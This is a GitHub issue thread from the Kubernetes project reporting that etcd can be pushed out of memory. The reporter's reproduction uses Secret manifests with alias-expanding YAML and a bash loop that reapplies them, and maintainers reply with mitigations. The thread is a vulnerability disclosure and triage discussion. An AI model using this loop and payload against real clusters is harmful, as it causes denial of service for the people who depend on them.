### ISSUE TITLE
Etcd used by kubernetes is vulnerable to OOM attack

### ISSUE THREAD

**Issue by younaman** [kubernetes/kubernetes#107325]
### What happened?

Etcd process on master node exhaust all memory, making DoS attack.
`top:`
`PID      USER      PR      NI     VIRT      RES      SHR      S      %CPU      %MEM      COMMAND`
`108       root       20       0      0            0          0           S      47.2         0.0            kswapd0`
`2218     root       20       0      15.6g    5.3g   18008      S      41.2         67.9          etcd`
`42509   root       20       0 1781692 637428 20168      S      39.9           7.9          kube-apiserver`       
* Notice that this is **not** the final state of my OS. Because after I take this snapshot, the master is OOM and this shell is broken.

### What did you expect to happen?

Is it a real **security issue** of kube-apiserver/etcd that makes this DoS attack? Or is it just because I missed something? For example, a misconfig?(But I do not modify any k8s config, **all settings are default**.)

### How can we reproduce it (as minimally and precisely as possible)?

* A malicious user leverage a secret1.yaml to create his own secret:
`apiVersion: v1`
`kind: Secret`
`metadata:`
`  namespace: my-namespace`
`  name: test-secretx`
`type: Opaque`
`stringData: `
`        attack.yaml: |`
`                a: &a ["test","test","test","test","test","test","ltest","test","test"]`
`                b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]`
`                c: &c [*a,*a,*a,*a,*a,*a,*a,*a,*a]`
`                ......                                            `
(I write a lot of useless data to attack.yaml, so the data size of secret1.yaml is near 200k)
* A malicious user leverage a **secret2**.yaml to update his own secret:
`apiVersion: v1`
`kind: Secret`
`metadata:`
`  namespace: my-namespace`
`  name: test-secretx`
`type: Opaque`
`stringData: `
`        attack.yaml: |`
`                a: &a ["test","test","test","test","test","test","ltest","test","test"]`
`                b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]`
`                c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]`
`                 ......                                              `
( The data size of secret2.yaml is the same as secret1.yaml, but the `stringData` is different)
* This malicious user update the `test-secretx` secret repeatedly:
`#!/bin/bash`
`while true`
`do`
`         kubectl apply -f secret1.yaml`
`         kubectl apply -f secret2.yaml`
`done`

* The memory of the master node will be exhausted in about 40+ minutes, making an OOM DoS attack.

### Kubernetes version

<details>

```console
$ kubectl version
`client Version:`
 `version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:18:45Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}`

`Server Version:`
`version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:12:29Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}`
```

</details>

### Cloud provider

<details>

</details>

### OS version

<details>

```console
# On Linux:
$ cat /etc/os-release
# `NAME="Ubuntu"`
`VERSION="20.04.2 LTS (Focal Fossa)"`
`ID=ubuntu`
`ID_LIKE=debian`
`PRETTY_NAME="Ubuntu 20.04.2 LTS"`
`VERSION_ID="20.04"`
`HOME_URL="https://www.ubuntu.com/"`
`SUPPORT_URL="https://help.ubuntu.com/"`
`BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"`
`PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"`
`VERSION_CODENAME=focal`
`UBUNTU_CODENAME=focal`
$ uname -a
# `Linux k8s-master 5.11.0-43-generic #47~20.04.2-Ubuntu SMP Mon Dec 13 11:06:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux`

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here
```

</details>

### Install tools

<details>
apt-get
</details>

### Container runtime (CRI) and and version (if applicable)

<details>

`younaman@k8s-master:~/Desktop$ sudo ctr version`
`[sudo] password for younaman: `
`Client:`
 ` Version:  1.5.2-0ubuntu1~20.04.3`
`  Revision: `
`  Go version: go1.13.8`

`Server:`
`  Version:  1.5.2-0ubuntu1~20.04.3`
`  Revision: `
`  UUID: b5c3f075-cafe-47e9-8cb9-98ece8f1107c`
</details>

### Related plugins (CNI, CSI, ...) and versions (if applicable)

<details>

</details>

**Comment by aojea** [comment]
How is this different of having another database like mysql on a system and adding data constantly? Ir creating files constantly in a system with random data?

I don't know if there are other mechanisms but I think that quotas will solve this problem https://kubernetes.io/docs/concepts/policy/resource-quotas/

**Comment by younaman** [comment]
@aojea Thaks for your reply! I have read the resource quotas carefully,and I think the quota you mentioned is `count/secrets`. However, this resource quota only limits the total number of secrets that a user can create, but not the number of updated versions of one secret! Have I missed something? Looking forward to your reply!

**Comment by aojea** [comment]
> However, this resource quota only limits the total number of secrets that a user can create, but not the number of updated versions of one secret! Have I missed something? Looking forward to your reply!

@liggitt is there additional mechanisms to avoid this problem?

**Comment by liggitt** [comment]
I thought that etcd compaction addressed this. My understanding is that the apiserver triggers an etcd history compaction every 5 minutes by default. Routing to @mm4tt to confirm or provide more details.

**Comment by mm4tt** [comment]
You're correct, etcd compaction is triggered by the api-server every 5min by default. In production, usually the interval is set even lower than the default.

In addition, etcd has a `--quota-backend-bytes` flag that can be used to set the maximum size of the etcd store. If the size of the etcd store is greater or equal the quota, no new write (including updating existing key) will be accepted. You can learn more about the mechanism here - https://etcd.io/docs/v3.4/op-guide/maintenance/#space-quota.  In the K8s on GCE deployment, used by OSS tests, the quota backend byte is set to 4GB by default: https://github.com/kubernetes/kubernetes/blob/6580977884c920db3339bbf5602a6782aaf7c205/cluster/gce/gci/configure-helper.sh#L1917

**Comment by aojea** [comment]
@younaman it seems this is a documentation issue, nobody can stop a power user of breaking a cluster, but we can see that the cluster admins have the necessary options and tools to configure the cluster in a way to avoid this "attacks"

This may be a nice starting point for a blog or doc 

/kind documentation
/remove-kind bug

**Comment by younaman** [comment]
@mm4tt Thanks for your reply! I check my k8s cluster again and confirm several configurations as you said:
* My `--quota-backend-bytes` is 2G, which is the default value and it do works on my cluster.
   * I tried another experiment to show the quota works on my cluster: When I write about 2000 1M secrets in my cluster(I expand the master node memory to 32G to avoid unexpected OOM). The cluster returned `etcd server: mvcc: database space exceeded`. So this quota seems 2G and it works on my cluster.
   * In other words. The issue I report seems can not be isolated or limited by this quota, because the cluster **does not** return any "out of quota" message even the master node(8G memory) is OOM.
* The default etcd compaction seems also works on my cluster. 
  * I tried my issue experiment again, and I notice that during the first 3 minutes, the memory usage of etcd increased very quickly( The memory usage reached almost 4G during the first 3 minutes). Then the etcd compaction seems works on my node. However, memory usage still increased slowly. And finally, my master node( 8G memory) was crashed by OOM after almost 40+ minutes.
 * I am not sure about the second point. But the `--quota-backend-bytes` seems can not defend against this issue? I am a green hand in etcd and if you are interested in my issue, perhaps you can try to reproduce my experiment to find more interesting details? Looking forward to your reply! :)

**Comment by younaman** [comment]
@mm4tt I have read more documents about etcd compaction. It seem like the default value of etcd compaction interval is 5 min. I use the default configuration, so it seems like the etcd compaction still works on my cluster. However, it still can not isolate or limit memory usage in my case to defend against this issue? Looking forward to your reply!

**Comment by sftim** [comment]
First up, you can set a memory limit on etcd - either using your Pod spec if running etcd in a static pod, or using OS-level mechanisms (like systemd scopes and unit restrictions) if not.

Even so, denial-of-service that merely OOMs the etcd is still a serious issue.
We'd welcome a [blog submission](https://kubernetes.io/docs/contribute/new-content/blogs-case-studies/) that either
- describes the issue and highlights it as a concern
- covers the issue, highlights it as a concern, and also sketches out a solution

**Comment by sftim** [comment]
If you want to limit how much data is written to etcd during one compaction interval, there _are_ mechanisms available in Kubernetes to make that possible.

One available mechanism is to use the admission control mechanism from validation admission webhooks and set your own limit on the size of a data storage resource. For example: deny writing any Secret or ConfigMap that has data larger than 20 KiB.

You could improve on that with another webhook mechanism to deny too-frequent writes to a Secret / ConfigMap.

I don't know of a handler in the ecosystem that implements this control, but I can picture how you'd write one.
- you can define an extended resource that you use in conjunction with a ResourceQuota to define a ceiling on the total size of Secrets in a namespace (slightly abusing the extended resource model)
  - or you can make your own CRD
- you can use ResourceQuota mechanism to limit the size of secrets
- you can use the webhook to set a rate limit on writes to ConfigMaps and Secrets
  - limits can be per-namespace, per-user, or based on a combination of both
  - again, you could put the configuration in a custom resourc
 
(aside: https://fanf2.user.srcf.net/hermes/doc/antiforgery/ratelimit.html gives part of a nice model of how to implement exponentially-weighted moving average rate limits that don't require a lot of storage)

**Comment by BenTheElder** [comment]
xref: https://github.com/kubernetes/kubernetes/issues/94029#issuecomment-892220009 re: compaction interval & automatic compaction

**Comment by mm4tt** [comment]
@younaman, please note that `--quota-backend-bytes` and etcd server memory usage are different things. The former controls how big the database can be, but it doesn't directly translate to memory usage of the server. 

The typical source of high memory usage is `Range` requests issued against etcd. For example, if your db size is 2GB and you send a `Range` request to read everything , etcd will allocate roughly 2GB of memory for the response. Now if you send 10 such requests in parallel, etcd can potentially allocate up two 20 GB of memory, depending on how long it takes for the client to read the response. 

If you worry that etcd will eat all the resources (memory) available on the control-plane node, then you should do what @sftim wrote - use pod  / OS level mechanisms to impose memory limits on the etcd container.

**Comment by younaman** [comment]
@mm4tt Thanks for your reply! I am sorry for reply you so late because I am a little busy these days :) 
* Thanks for your response again and I do a similar expirement as you said, which are called "expensive request". In my opinion, the etcd and Kubernetes has no method to defend against the "expensive request", perhaps because the design of etcd doesn't consider a lot about QoS?
* Besides, I use cgroup to limit the memory used by etcd, it do avoid the master node OOM. However, when I limit the memory used by etcd and malicious user do some "expensive request" or "update version", the victim user's request will be delayed because of the limited memory. In other words, the memory limits still can not solve the problem perfectly considering the QoS of kubernetes/etcd.
* By the way, it seems that most green hand of Kubernetes(For example, I am a k8s administrator of a small workgroup) will not change the **master node's** configuration, in other words, we just install it and use it with the **default configuration**. We do know that the resource used by **worker** pods should be limited/isolated. For the master node's OOM or IO related issue, what I can do is just search Google and "May God bless me". So, in my opinion, Kubernetes should provide more strong default configuration to defend against this issue:) Looking forward to your reply!

**Comment by dims** [comment]
cc @nikhita

**Comment by mm4tt** [comment]
Please note that etcd API is not surfaced directly to Kubernetes users. In typical kubernetes setup, etcd API is only accessible to kube-apiserver and it's not exposed directly to K8s users. So the "expensive request" problem is actually more K8s problem than etcd problem. Also, there are efforts in K8s like [API Priority and Fairness](https://kubernetes.io/docs/concepts/cluster-administration/flow-control/) which in a way address it.

One more thing, I don't see an obvious attack vector here, as issuing a LIST request to K8s requires being authenticated and authorized to do so for a given resource type. This means that a cluster admin has means to protect the cluster or counteract if such a situation occurs.

**Comment by sftim** [comment]
We should triage this as accepted or invalid

/lifecycle frozen
pending that triage.
